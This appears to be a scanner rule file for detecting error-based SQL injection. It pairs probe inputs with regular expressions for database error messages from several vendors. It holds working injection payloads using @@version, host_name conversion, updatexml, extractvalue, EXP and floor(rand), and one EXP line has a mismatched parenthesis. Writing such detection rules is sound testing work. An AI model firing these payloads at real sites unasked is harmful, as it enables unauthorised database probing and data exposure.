<?xml version="1.0" encoding="UTF-8"?>
<rules>
    <couple id="1">
        <requests>
            "a'b"c'd""
        </requests>
        <responses>
            System.Data.OleDb.OleDbException
            \[SQL Server\]
            \[Microsoft\]\[ODBC SQL Server Driver\]
            \[SQLServer JDBC Driver\]
            \[SqlException
            System.Data.SqlClient.SqlException
            Unclosed quotation mark after the character string
            '80040e14'
            mssql_query\(\)
            odbc_exec\(\)
            Microsoft OLE DB Provider for ODBC Drivers
            Microsoft OLE DB Provider for SQL Server
            Incorrect syntax near
            Sintaxis incorrecta cerca de
            Syntax error in string in query expression
            ADODB.Field \(0x800A0BCD\)&lt;br&gt;
            ADODB.Recordset'
            Unclosed quotation mark before the character string
            '80040e07'
            Microsoft SQL Native Client error
            SQLCODE
            DB2 SQL error\:
            SQLSTATE
            \[CLI Driver\]
            \[DB2/6000\]
            Sybase message\:
            Sybase Driver
            \[SYBASE\]
            Syntax error in query expression
            Data type mismatch in criteria expression.
            Microsoft JET Database Engine
            \[Microsoft\]\[ODBC Microsoft Access Driver\]
            Microsoft OLE DB Provider for Oracle
            wrong number or types
            PostgreSQL query failed\:
            supplied argument is not a valid PostgreSQL result
            unterminated quoted string at or near
            pg_query\(\) \[\:
            pg_exec\(\) \[\:
            supplied argument is not a valid MySQL
            Column count doesn\'t match value count at row
            mysql_fetch_array\(\)
            mysql_
            on MySQL result index
            You have an error in your SQL syntax
            MySQL server version for the right syntax to use
            Division by zero in
            not a valid MySQL result
            \[MySQL\]\[ODBC
            Column count doesn't match
            the used select statements have different number of columns
            DBD\:\:mysql\:\:st execute failed
            DBD\:\:mysql\:\:db do failed\:
            com\.informix\.jdbc
            Dynamic Page Generation Error\:
            An illegal character has been found in the statement
            \[Informix\]
            &lt;b&gt;Warning&lt;/b&gt;\:  ibase_
            Dynamic SQL Error
            \[DM_QUERY_E_SYNTAX\]
            has occurred in the vicinity of\:
            A Parser Error \(syntax error\)
            java.sql.SQLException
            Unexpected end of command in statement
            \[Macromedia\]\[SQLServer JDBC Driver\]
            could not prepare statement
            Unknown column
            where clause
            SqlServer
            syntax error
            Procedure '[^']+' requires parameter '[^']+'
            PLS-[0-9][0-9][0-9][0-9]
            ORA-[0-9][0-9][0-9][0-9]
            Table '[^']+' doesn't exist
            SELECT .*? FROM .*?
            UPDATE .*? SET .*?
            INSERT INTO .*?
        </responses>
    </couple>
    <couple id="3">
        <requests>
            %20and 1=@@version -- t
            ' and 1=@@version -- t
            " and 1=@@version -- t
            ') and 1=@@version -- t
            ") and 1=@@version -- t
            ) and 1=@@version -- t
            %20and 1=convert(int,(select host_name())) -- t
            ' and 1=convert(int,(select host_name())) -- t
            " and 1=convert(int,(select host_name())) -- t
            ") and 1=convert(int,(select host_name())) -- t
            ') and 1=convert(int,(select host_name())) -- t
            ) and 1=convert(int,(select host_name())) -- t
            %20and updatexml(1,concat(0x7e,(SELECT md5(123)),0x7e),1)-- t
            ' and updatexml(1,concat(0x7e,(SELECT md5(123)),0x7e),1)-- t
            ') and updatexml(1,concat(0x7e,(SELECT md5(123)),0x7e),1)-- t
            " and updatexml(1,concat(0x7e,(SELECT md5(123)),0x7e),1)-- t
            ") and updatexml(1,concat(0x7e,(SELECT md5(123)),0x7e),1)-- t
            ) and updatexml(1,concat(0x7e,(SELECT md5(123)),0x7e),1)-- t
            %20and extractvalue(1, concat(0x7e, (select md5(123)),0x7e))-- t
            ' and extractvalue(1, concat(0x7e, (select md5(123)),0x7e))-- t
            " and extractvalue(1, concat(0x7e, (select md5(123)),0x7e))-- t
            ") and extractvalue(1, concat(0x7e, (select md5(123)),0x7e))-- t
            ') and extractvalue(1, concat(0x7e, (select md5(123)),0x7e))-- t
            ) and extractvalue(1, concat(0x7e, (select md5(123)),0x7e))-- t
            %20AND EXP(~(SELECT * FROM (SELECT CONCAT(0x71,(SELECT md5(123)),0x71,0x78))x))
            ' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x71,(SELECT md5(123)),0x71,0x78))x))
            " AND EXP(~(SELECT * FROM (SELECT CONCAT((0x71,(SELECT md5(123)),0x71,0x78))x))
            ") AND EXP(~(SELECT * FROM (SELECT CONCAT(0x71,(SELECT md5(123)),0x71,0x78))x))
            ') AND EXP(~(SELECT * FROM (SELECT CONCAT(0x71,(SELECT md5(123)),0x71,0x78))x))
            ) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x71,(SELECT md5(123)),0x71,0x78))x))
            %20and(select 1 from(select count(*),concat((select (select (select md5(123))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- t
            ' and(select 1 from(select count(*),concat((select (select (select md5(123))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- t
            ') and(select 1 from(select count(*),concat((select (select (select md5(123))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- t
            " and(select 1 from(select count(*),concat((select (select (select md5(123))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- t
            ") and(select 1 from(select count(*),concat((select (select (select md5(123))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- t
            ) and(select 1 from(select count(*),concat((select (select (select md5(123))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- t
        </requests>
        <responses>
            Microsoft SQL Server
            System.Data.SqlClient.SqlConnection.OnError
            202cb962
            mysql_fetch_array\(\)
            You have an error in your SQL syntax
        </responses>
    </couple>
</rules>